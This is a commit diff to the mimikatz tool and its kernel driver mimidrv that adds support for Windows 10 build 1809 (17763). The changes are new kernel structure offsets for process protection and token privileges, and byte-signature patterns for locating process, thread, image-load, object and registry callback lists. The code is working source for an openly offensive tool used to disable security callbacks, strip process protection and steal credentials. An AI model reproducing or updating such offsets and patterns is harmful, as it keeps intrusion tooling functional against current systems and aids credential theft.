[new] mimikatz & mimidrv full support for Windows 1809

Speedi13 · Dec 3, 2018 · 2fd09bb · 2fd09bb
1 parent e380feb
commit 2fd09bb
Show file tree

Hide file tree

Showing 14 changed files with 65 additions and 23 deletions.
diff --git a/inc/globals.h b/inc/globals.h
@@ -90,12 +90,13 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_7		7600
 #define KULL_M_WIN_BUILD_8		9200
 #define KULL_M_WIN_BUILD_BLUE	9600
-#define KULL_M_WIN_BUILD_10_1507		10240
-#define KULL_M_WIN_BUILD_10_1511		10586
-#define KULL_M_WIN_BUILD_10_1607		14393
-#define KULL_M_WIN_BUILD_10_1703		15063
-#define KULL_M_WIN_BUILD_10_1709		16299
-#define KULL_M_WIN_BUILD_10_1803		17134
+#define KULL_M_WIN_BUILD_10_1507	10240
+#define KULL_M_WIN_BUILD_10_1511	10586
+#define KULL_M_WIN_BUILD_10_1607	14393
+#define KULL_M_WIN_BUILD_10_1703	15063
+#define KULL_M_WIN_BUILD_10_1709	16299
+#define KULL_M_WIN_BUILD_10_1803	17134
+#define KULL_M_WIN_BUILD_10_1809	17763
 
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500

diff --git a/mimidrv/globals.h b/mimidrv/globals.h
@@ -40,7 +40,8 @@ typedef enum _KIWI_OS_INDEX {
 	KiwiOsIndex_10_1703	= 10,
 	KiwiOsIndex_10_1709	= 11,
 	KiwiOsIndex_10_1803	= 12,
-	KiwiOsIndex_MAX		= 13,
+	KiwiOsIndex_10_1809	= 13,
+	KiwiOsIndex_MAX		= 14,
 } KIWI_OS_INDEX, *PKIWI_OS_INDEX;
 
 #ifdef _M_IX86

diff --git a/mimidrv/kkll_m_filters.c b/mimidrv/kkll_m_filters.c
@@ -22,6 +22,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1703*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1709*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1803*/{0x004c, 0x000c, 0x0010, 0x0040},
+/* 10_1809*/{0x004c, 0x000c, 0x0010, 0x0040},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -36,6 +37,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1703*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1709*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1803*/{0x0090, 0x0018, 0x0020, 0x0060},
+/* 10_1809*/{0x0090, 0x0018, 0x0020, 0x0060},
 #endif
 };
 

diff --git a/mimidrv/kkll_m_notify.c b/mimidrv/kkll_m_notify.c
@@ -33,6 +33,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 };
 UCHAR PTRN_W23_Process[] =	{0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
 UCHAR PTRN_WVI_Process[] =	{0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
@@ -56,6 +57,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process},	L"PsSetCreateProcessNotifyRoutine",		L"RtlGetSystemBootStatus",				{ -4, 64}},
 	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process},	L"PsSetCreateProcessNotifyRoutine",		L"EtwEnableTrace",					{ -4, 64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KseQueryDeviceFlags",				{ -4, 64}},
 };
 UCHAR PTRN_W23_Image[] =	{0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
 UCHAR PTRN_WVI_Image[] =	{0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
@@ -75,6 +77,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutineEx",		L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 };
 UCHAR PTRN_W23_Object[] =	{0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
 UCHAR PTRN_WVI_Object[] =	{0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
@@ -94,6 +97,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 };
 UCHAR PTRN_W23_Reg[] =	{0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
 UCHAR PTRN_WVI_Reg[] =	{0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
@@ -113,6 +117,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 };
 #elif defined _M_IX86
 UCHAR PTRN_WXP_Thread[] =	{0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
@@ -134,6 +139,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {	// PspCreateThreadNotifyRoutine
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"IoRegisterDeviceInterface",		{ -4, 64}},
 };
 UCHAR PTRN_WXP_Process[] =	{0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
 UCHAR PTRN_W23_Process[] =	{0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
@@ -156,6 +162,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {	// PspCreateProcessNotifyRoutine
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
 };
 UCHAR PTRN_WXP_Image[] =	{0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
 UCHAR PTRN_W23_Image[] =	{0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
@@ -178,6 +185,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {	// PspLoadImageNotifyRoutine
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1709_Image), PTRN_W10_1709_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_1709_Image), PTRN_W10_1709_Image},	L"PsSetLoadImageNotifyRoutineEx",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 };
 UCHAR PTRN_WXP_Object[] =	{0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
 UCHAR PTRN_W23_Object[] =	{0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
@@ -187,6 +195,7 @@ UCHAR PTRN_WI8_Object[] =	{0x33, 0xc0, 0x8b, 0xf8, 0x66, 0x89, 0x44, 0x24, 0x2a,
 UCHAR PTRN_W81_Object[] =	{0x8d, 0x44, 0x24, 0x14, 0x50, 0x33, 0xc0, 0x89, 0x7c, 0x24, 0x18, 0x50, 0x6a, 0x40};
 UCHAR PTRN_W10_Object[] =	{0x66, 0x8b, 0x02, 0x49, 0x8d, 0x52, 0x02, 0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
 UCHAR PTRN_W10_1703_Object[] =	{0x0f, 0xb7, 0x07, 0x49, 0x03, 0xfa, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
+UCHAR PTRN_W10_1809_Object[] =	{0x33, 0xc0, 0x89, 0x44, 0x24, 0x38, 0x89, 0x44, 0x24, 0x3c, 0x66, 0x89, 0x44, 0x24, 0x4a, 0xc7, 0x44, 0x24, 0x4c, 0x34, 0x12, 0xff, 0xff};
 KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
 	{KiwiOsIndex_XP,		{sizeof(PTRN_WXP_Object), PTRN_WXP_Object},			L"ObCreateObjectType",						L"NtOpenThread",					{ -4, 0x040, 0x08c}},
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Object), PTRN_W23_Object},			L"ObCreateObjectType",						L"NtOpenThread",					{ -4, 0x040, 0x08c}},
@@ -199,6 +208,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},			L"ObCreateObjectType",						L"KseRegisterShim",					{ 23, 0x008, 0x058, 0x088}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Object), PTRN_W10_1703_Object},	L"ObCreateObjectType",					L"KseRegisterShim",					{ 21, 0x008, 0x058, 0x088}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1703_Object), PTRN_W10_1703_Object},	L"ObCreateObjectType",					L"KseRegisterShim",					{ 21, 0x008, 0x058, 0x088}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_1809_Object), PTRN_W10_1809_Object},	L"ObCreateObjectType",					L"KseRegisterShim",					{ -4, 0x008, 0x058, 0x088}},
 };
 UCHAR PTRN_WXP_Reg[] =	{0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
 UCHAR PTRN_W23_Reg[] =	{0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
@@ -220,6 +230,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},			L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Reg), PTRN_W10_1703_Reg},	L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1703_Reg), PTRN_W10_1703_Reg},	L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
+	{KiwiOsIndex_10_1809,	{sizeof(PTRN_W10_1703_Reg), PTRN_W10_1703_Reg},	L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 };
 #endif
 

diff --git a/mimidrv/kkll_m_process.c b/mimidrv/kkll_m_process.c
@@ -7,6 +7,7 @@
 
 const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 {					/*  EprocessNext, EprocessFlags2, TokenPrivs, SignatureProtect */
+					/*  dt nt!_EPROCESS -n ActiveProcessLinks -n Flags2 -n SignatureLevel */
 #ifdef _M_IX86
 /* UNK	*/	{0},
 /* XP	*/	{0x0088},
@@ -21,6 +22,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
 /* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
 /* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
+/* 10_1809*/{0x00b8, 0x00c8, 0x0040, 0x02f4},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -35,6 +37,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 /* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 /* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8},
+/* 10_1809*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 #endif
 };
 

diff --git a/mimidrv/kkll_m_process.h b/mimidrv/kkll_m_process.h
@@ -15,8 +15,7 @@ typedef enum _KIWI_PROCESS_INDEX {
 	Eprocess_MAX	= 4,
 } KIWI_PROCESS_INDEX, *PKIWI_PROCESS_INDEX;
 
-typedef struct _KIWI_NT6_PRIVILEGES
-{
+typedef struct _KIWI_NT6_PRIVILEGES {
 	UCHAR Present[8];
 	UCHAR Enabled[8];
 	UCHAR EnabledByDefault[8];

diff --git a/mimidrv/mimidrv.c b/mimidrv/mimidrv.c
@@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
 
 KIWI_OS_INDEX getWindowsIndex()
 {
-	if(*NtBuildNumber > 17134) // forever 10 =)
-		return KiwiOsIndex_10_1803;
+	if(*NtBuildNumber > 17763) // forever 10 =)
+		return KiwiOsIndex_10_1809;
 
 	switch(*NtBuildNumber)
 	{
@@ -213,6 +213,9 @@ KIWI_OS_INDEX getWindowsIndex()
 		case 17134:
 			return KiwiOsIndex_10_1803;
 			break;
+		case 17763:
+			return KiwiOsIndex_10_1809;
+			break;
 		default:
 			return KiwiOsIndex_UNK;
 	}